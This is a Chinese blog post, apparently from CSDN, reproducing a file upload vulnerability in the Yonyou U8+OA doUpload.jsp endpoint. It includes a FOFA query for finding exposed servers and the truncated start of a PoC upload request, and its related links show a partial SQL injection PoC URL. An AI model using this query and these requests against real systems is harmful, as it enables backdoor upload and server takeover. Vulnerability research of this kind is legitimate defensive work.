用友U8+OA doUpload.jsp 文件上传漏洞复现

最新推荐文章于 2024-04-20 23:11:52 发布
最新推荐文章于 2024-04-20 23:11:52 发布
阅读量645 收藏 1
点赞数 4
分类专栏: 漏洞复现 文章标签: web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41904294/article/details/136064202
版权

0x01 产品简介

用友U8+ OA经过20多年的市场锤炼,不断贴近客户需求,以全新UAP为平台,应对中型及成长型企业客户群的发展,提供的是一整套企业级数智化升级解决方案,为成长型企业构建精细管理、产业链协同、社交化运营为一体的企业互联网经营管理平台,助力企业应势而变,赢得未来。

0x02 漏洞概述

用友U8+ OA  doUpload.jsp 接口存在文件上传漏洞,攻击者可通过该漏洞在服务器端写入后门文件,任意执行代码,获取服务器权限,进而控制整个 web 服务器。

0x03 影响范围

用友U8+OA 基础版+企业版

0x04 复现环境

FOFA:"用友U8-OA" && body="yyoa"

0x05 漏洞复现

PoC

POST /yyoa/portal/tools/doUpload.jsp HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36(KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryb9CPBiwbTONqdE5v
Accept: text/html,application/xhtml+xml,application/xm
了解本专栏 订阅专栏 解锁全文 超级会员免费看
0xSecl
关注
  • 4
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
订阅专栏
用友OA U8 test.jsp sql注入漏洞复现
qq_44828901的博客
06-21 1501
简单验证、复现漏洞
用友OA/NC/NCCloud漏洞集合
qq_53229503的博客
08-16 8021
用友OA/NC/NCCloud漏洞集合
用友OA漏洞复现手册_cnnvd-201610-923,2024字节跳动春招技术面试题
最新发布
2301_76223496的博客
04-20 513
title=“用友GRP-U8行政事业内控管理软件”(4)查看指定数据库,表中字段的字段值。(3)查看指定表中的字段名。查看所有数据库中的表名。
复现用友U8 oa协同工作系统 文件上传漏洞_57
fushuang333的博客
02-24 970
复现用友U8 oa协同工作系统 文件上传漏洞,上传文件漏洞的影响可能会非常严重,上传可执行代码可能让攻击者获得服务器控制权。
用友OA漏洞复现手册
热门推荐
1stPeak's Blog
04-20 1万+
用友OA漏洞复现手册 前言:用友OA产品漏洞复现笔记,供自己使用,不定期更新
用友U8-OA协同工作系统doUpload.jsp接口任意文件上传漏洞
败在我手中之敌,从来不会被我视为对手,我给你时间追赶,直至你遥望不见。
02-24 392
用友协同云是新一代的企业社交化协同办公平台,不仅为企业提供协同办公服务,更作为企业数字化工作入口,服务企业内部员工、连接企业外部伙伴及上下游产业链。通过移动端、Web 端、PC桌面端等多端联动,为企业提供统一服务入口、沟通协作、办公协同、企业文化激活、业务协同等全方位的数智化工作平台。用友U8-OA 协同工作系统遵循 J2EE 架构,以 JSP 和 JAVA BEAN 技术作为主要的系统实现手段,开发出了工作流、文档、消息提醒和插件接口
node.js文件上传重命名以及移动位置的示例代码
12-23
一个关于node上传文件的例子,下面是前端代码, doUpload() { var formData = new FormData($("#uploadForm")[0]); $.ajax({ url: 'http://localhost:3011/upload', type: 'POST', data: formData, async: ...
php实现文件上传基本验证
12-20
本文实例为大家分享了php实现文件上传基本验证的具体代码,供大家参考,具体内容如下 Html部分 <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <title>文件上传&lt...
vue实现文件上传功能
01-19
vue 文件上传,供大家参考,具体内容如下 首先 先说一下想要实现的效果 就如截图所见,需要将企业和需要上传的文件提交到后台处理,那么接下来就说如何实现 vue 实现 vue 页面代码 ref=upload action=...
文件上传
05-05
通过jsp前端进行多文件上传 显示层代码: <%@ page language="java" import="java.util.*" pageEncoding="GBK"%> <%@ page import="com.jspsmart.upload.*" %> <!DOCTYPE ...
JEE2实现文件上传
03-16
在 JEE2 中,我们可以使用 Servlet 和 JSP 来实现文件上传。 首先,我们需要了解 HTTP 请求的机制。HTTP 请求是指客户端向服务器端发送请求的过程。在文件上传过程中,我们需要了解如何解析 HTTP 请求中的文件信息...
用友 U8 Cloud upload.jsp 文件上传漏洞复现
0xSec
12-12 763
用友U8 Cloud upload.jsp接口存在任意文件上传漏洞,攻击者可通过该漏洞上传木马,远程控制服务器。
某友U8-OA协同工作系统doUpload.jsp接口任意文件上传漏洞(附漏洞检测脚本)
jjjj1029056414的博客
02-23 529
某友U8-OA协同工作系统doUpload.jsp接口任意文件上传漏洞,附带自己写的poc脚本
用友U8+OA doUpload.jsp 文件上传漏洞
weixin_52204925的博客
02-08 782
用友U8+OA doUpload.jsp 文件上传漏洞
用友OA漏洞学习——test.jsp SQL注入漏洞
记录并分享学习安全的知识点..
05-02 3488
警告 请勿使用本文提到的内容违反法律。 本文不提供任何担保 目录 警告 一、概述 二、影响版本 三、漏洞复现 验证poc如下: 一、概述 用友 U8 OA test.jsp文件存在 SQL注入漏洞,由于与致远OA使用相同的文件,于是存在了同样的漏洞。 二、影响版本 用友 U8 OA产品,版本不详。 三、漏洞复现 验证poc如下: /yyoa/common/js/menu/test.jsp?doType=101&S1=(SELECT%2...
OA检测工具-I-Wanna-Get-All(四)
siu~
02-26 435
基于Apt-T00ls二次开发工具,I Wanna Get All 安全工具, 严禁一切未授权漏洞扫描攻击。使用工具前建议判断系统指纹框架,部分漏洞接口探测存活判断是否成功,实际利用情况以执行情况为准。
【1day】用友GRP-U8 OA日志泄露漏洞学习
记录并分享学习安全的知识点..
09-29 233
用友GRP-U8 OA是一款企业级管理软件,主要面向中小型企业,提供全面的业务管理解决方案,包括财务、人力资源、采购、销售、仓库、生产等多个模块。用友GRP-U8 OA存在日志泄露漏洞,攻击者可以从系统或应用程序的日志中获取敏感信息的漏洞。这些敏感信息可能包括用户凭据、会话令牌、交易数据、个人身份信息等等。
DIVA靶场测试APP客户端不规范项(一)_diva android 是什么应用
wdsfgj的博客
04-17 764
使用了SharedPreferences类,该类是Android平台上一个轻量级的存储类,主要是用来保存一些常用的配置,本例中是用该类存储了用户名和密码,因此是具有风险的。SharedPreferences类存储的数据会以.xml的形式存储在/data/data/apppackagename/shared_prefs目录下。一般app对应的数据库目录: /data/data/apppackagename/databases。使用adb查看临时文件,目录在/data/data/apppackagename/
SpringBoot使用MultipartFile类上传文件,@Async异步处理报文件不存在异常
03-28
可能是因为异步处理方法执行时,上传文件的流已经关闭了,导致文件不存在异常。可以将上传文件的流传递到异步处理方法中,或者使用Spring的TaskExecutor来异步处理文件上传。具体实现方法可以参考以下代码: ``` @PostMapping("/upload") public String handleFileUpload(@RequestParam("file") MultipartFile file) throws IOException { // 保存上传文件 String fileName = StringUtils.cleanPath(file.getOriginalFilename()); File tempFile = new File(fileName); file.transferTo(tempFile); // 异步处理上传文件 taskExecutor.execute(() -> { try { // 使用保存在本地的临时文件处理上传任务 doUpload(tempFile); } catch (IOException e) { e.printStackTrace(); } finally { // 删除临时文件 tempFile.delete(); } }); return "File uploaded successfully!"; } @Async public void doUpload(File file) throws IOException { // 处理上传文件任务 // ... } ``` 在上传文件时,先将文件保存在本地的临时文件中,然后使用TaskExecutor来执行异步处理任务。在异步处理方法中,使用保存在本地的临时文件处理上传任务,最后删除临时文件。这样就避免了文件不存在异常的问题。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

0xSecl

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值